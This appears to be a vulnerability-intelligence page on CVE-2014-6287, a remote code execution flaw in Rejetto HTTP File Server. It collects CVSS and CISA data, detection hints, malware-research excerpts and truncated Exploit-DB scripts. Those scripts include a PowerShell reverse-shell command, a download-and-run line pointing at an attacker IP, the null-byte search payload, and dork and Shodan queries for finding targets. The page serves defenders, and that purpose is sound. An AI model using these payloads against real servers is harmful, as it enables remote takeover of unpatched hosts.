CVE-2014-6287
published 2014-10-07CVE-2014-6287: The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
99.32%
99.9th percentile
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| rejetto | http_file_server | >= 2.3 < 2.3c | 2.3c |
Detection & IOCsextracted from sources · hover to see the quote
- →Hunt for mshta.exe spawned by an HFS/web server process as a child process — this is the execution chain used by CVE-2014-6287 exploitation in BlackSquid ↗
- →Use Metasploit module exploit/windows/http/rejetto_hfs_exec to validate exposure; target is HttpFileServer httpd 2.3 on TCP/80 ↗
- →Detect the null-byte search request pattern in HTTP traffic to HFS: look for GET requests to the HFS search endpoint containing '%00' in the query string ↗
- ·CVE-2014-6287 only affects Rejetto HFS versions 2.3x before 2.3c; systems running 2.3c or later are not vulnerable ↗
- ·BlackSquid employs anti-VM, anti-debug, and anti-sandbox checks before executing its exploit chain; detections in sandbox environments may not trigger the CVE-2014-6287 payload ↗
- ·The hardware breakpoint evasion routine in BlackSquid is hard-coded at 0 (disabled) as of the analyzed sample, meaning this specific check may not be active in all variants ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2hx5-63mq-crfj: The findMacroMarker function in parserLib
ghsa_unreviewed·2022-05-13
CVE-2014-6287 [CRITICAL] CWE-94 GHSA-2hx5-63mq-crfj: The findMacroMarker function in parserLib
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.
VulnCheck
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
vulncheck·2014·CVSS 9.8
CVE-2014-6287 [CRITICAL] CWE-94 Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (HFS or HttpFileServer) allows remote attackers to execute arbitrary programs.
Affected: Rejetto HTTP File Server
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.trendmicro.com/en_us/research/19/f/blacksquid-slithers-into-servers-and-drives-with-8-notorious-exploits-to-drop-xmrig-miner.html; https://s.tencent.com/research/report/737.html; https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities-exploits-and-malware-driving-attack-campaigns-in-november-2019; https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/; https://research.checkpoint.com/2020/rudeminer-b
CISA
Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2014-6287 [CRITICAL] CWE-94 Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
Vulnerability: Rejetto HTTP File Server (HFS) Remote Code Execution Vulnerability
Affected: Rejetto HTTP File Server (HFS)
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (HFS or HttpFileServer) allows remote attackers to execute arbitrary programs.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2014-6287
Remediation Due Date: 2022-04-15
No detection rules found.
Exploit-DB
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
exploitdb·2021-02-23·CVSS 9.8
CVE-2014-6287 [CRITICAL] HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
---
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $clien
Exploit-DB
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
exploitdb·2020-11-30·CVSS 9.8
CVE-2014-6287 [CRITICAL] Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
---
# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 28-11-2020
# Remote: Yes
# Exploit Author: Óscar Andreu
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
#!/usr/bin/python3
# Usage : python3 Exploit.py
# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')"
import urllib3
import sys
import urllib.parse
try:
http = urllib3.PoolManager()
url = f'http://{s
Exploit-DB
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
exploitdb·2016-01-04·CVSS 9.8
CVE-2014-6287 [CRITICAL] Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)
---
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, ove
Exploit-DB
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)
exploitdb·2014-10-09
CVE-2014-6287 Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 "Rejetto HttpFileServer Remote Command Execution",
'Description' => %q{
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a
poor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by
using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b
over Windows XP SP3, Windows 7 SP1 and Windows 8.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Linguaglossa ', # orginal discovery
'Muhamad Fadzil Ramli ' # metasploit module
],
'References' =>
[
['CVE',
Exploit-DB
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
exploitdb·2014-09-15·CVSS 9.8
CVE-2014-6287 [CRITICAL] Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)
---
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 11-09-2014
# Remote: Yes
# Exploit Author: Daniele Linguaglossa
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ofs:integer=1):integer;
begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;
it will not handle null byte so a request to
http://localhost:80/?search=%00{.exec|cmd.}
will stop regex from parse macro , and macro will be executed and remote code injecti
Metasploit
Rejetto HttpFileServer Remote Command Execution
metasploit
Rejetto HttpFileServer Remote Command Execution
Rejetto HttpFileServer Remote Command Execution
Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by using '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b over Windows XP SP3, Windows 7 SP1 and Windows 8.
Nuclei
HTTP File Server <2.3c - Remote Command Execution
nuclei·CVSS 9.8
CVE-2014-6287 [CRITICAL] HTTP File Server <2.3c - Remote Command Execution
HTTP File Server =2.3c) to mitigate this vulnerability.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287
- http://www.kb.cert.org/vuls/id/251276
- http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html
- https://github.com/rapid7/metasploit-framework/pull/3793
- https://nvd.nist.gov/vuln/detail/CVE-2014-6287
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: 'CVE-2014-6287'
cwe-id: CWE-94
epss-score: 0.94363
epss-percentile: 0.99963
cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: rejetto
product: http_file_server
shodan-query: http.favicon.hash:2124459909
fofa-query: icon_hash=2124459909
tags: cve2014,cve,packetstorm,msf,hf
Checkpoint
Rudeminer, Blacksquid and Lucifer Walk Into A Bar
blogs_checkpoint·2020-09-15·CVSS 9.8
CVE-2018-10561 [CRITICAL] Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Rudeminer, Blacksquid and Lucifer Walk Into A Bar
Research by David Driker, Amir Landau
Background
Lucifer is a Windows crypto miner and DDOS hybrid malware. Three months ago, researcher
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
[CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Threat Research Center
Threat Research
Vulnerabilities
## Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
Ken Hsu
Durgesh Sangvikar
Zhibin Zhang
Chris Navarrete
Published: June 24, 2020
Threat Research
Vulnerabilities
Cryptocurrency mining
Cryptojacking
DDoS
Lucifer
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker th
Unit42
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
blogs_unit42·2020-06-24·CVSS 9.8
CVE-2019-9081 [CRITICAL] Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices
## Executive Summary
On May 29, 2020, Unit 42 researchers discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts. The first wave of the campaign stopped on June 10, 2020. The attacker then resumed their campaign on June 11, 2020, spreading an upgraded version of the malware and wreaking havoc. The sample was compiled on Thursday, June 11, 2020 10:39:47 PM UTC and caught by Palo Alto Networks Next-Generation Firewall. At the time of writing, the campaign’s still ongoing.
Lucifer is quite powerful in its capabilities. Not only is it capable
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Cyber Threats
## BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw Jun 03, 2019 Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, ne
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Cyber Threats
# BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw
2019/06/03
Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, netw
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Cyber Threats
# BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw
Jun 03, 2019
Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, ne
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Cyber Threats
## BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw 2019/06/03 Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, netw
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Minacce cyber
## BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw Jun 03, 2019 Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, ne
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Ciberamenazas
## BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw Jun 03, 2019 Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers, ne
Trendmicro
BlackSquid Infects Servers and Drives, 8 Exploits Used
blogs_trendmicro·2019-06-03·CVSS 9.8
[CRITICAL] BlackSquid Infects Servers and Drives, 8 Exploits Used
Cyberbedrohungen
## BlackSquid Infects Servers and Drives, 8 Exploits Used
We found a new wormable malware we've named BlackSquid targeting web servers, network and removable drives using evasion, anti-virtualization, anti-debugging, and anti-sandboxing techniques to drop a Monero miner.
By: Johnlery Triunfante, Mark Vicente, Jay Nebre, Earle Maui Earnshaw Jun 03, 2019 Read time: ( words)
Save to Folio
We updated this article on August 27, 2019 at 7:37 PM PST to include a co-author and amend the solution.
An unpatched security flaw that gets successfully exploited is one thing. But eight exploits that can stealthily and simultaneously get through your businesses’ assets and data and your customers’ information are quite another. We found a new malware family that targets web servers,
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
NoiseLetter June 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
CTF
EZ / optimum
ctf_writeups·CVSS 7.8
[HIGH] EZ / optimum
# recon
- nmap
```
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GEN
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
CTF
Optimum / README
ctf_writeups·CVSS 9.8
[CRITICAL] Optimum / README
### IP
`10.10.10.8`
# Recon
### nmap
`nmap -sC -sV 10.10.10.8 -o Optimum.nmap`
```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-23 18:54 EST
Nmap scan report for 10.10.10.8
Host is up (0.051s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
```
* This looks very minimal... just port 80
* When we look on the website, we can see a link to [HttpFileServer 2.3](http://www.rejetto.com/hfs/), which takes us to Rejetto's website
# Exploitation
## 1. Manual
* When we
http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/135122/Rejetto-HTTP-File-Server-2.3.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/160264/Rejetto-HttpFileServer-2.3.x-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/161503/HFS-HTTP-File-Server-2.3.x-Remote-Code-Execution.htmlhttp://www.kb.cert.org/vuls/id/251276https://github.com/rapid7/metasploit-framework/pull/3793https://www.exploit-db.com/exploits/39161/http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/135122/Rejetto-HTTP-File-Server-2.3.x-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/160264/Rejetto-HttpFileServer-2.3.x-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/161503/HFS-HTTP-File-Server-2.3.x-Remote-Code-Execution.htmlhttp://www.kb.cert.org/vuls/id/251276https://github.com/rapid7/metasploit-framework/pull/3793https://www.exploit-db.com/exploits/39161/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2014-6287
2014-10-07
Published
2022-03-25
Added to CISA KEV
Exploited in the wild